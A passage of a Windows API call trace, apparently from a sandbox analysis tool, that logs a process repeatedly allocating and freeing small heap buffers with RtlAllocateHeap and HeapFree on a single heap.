[0196.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0196.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0196.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | 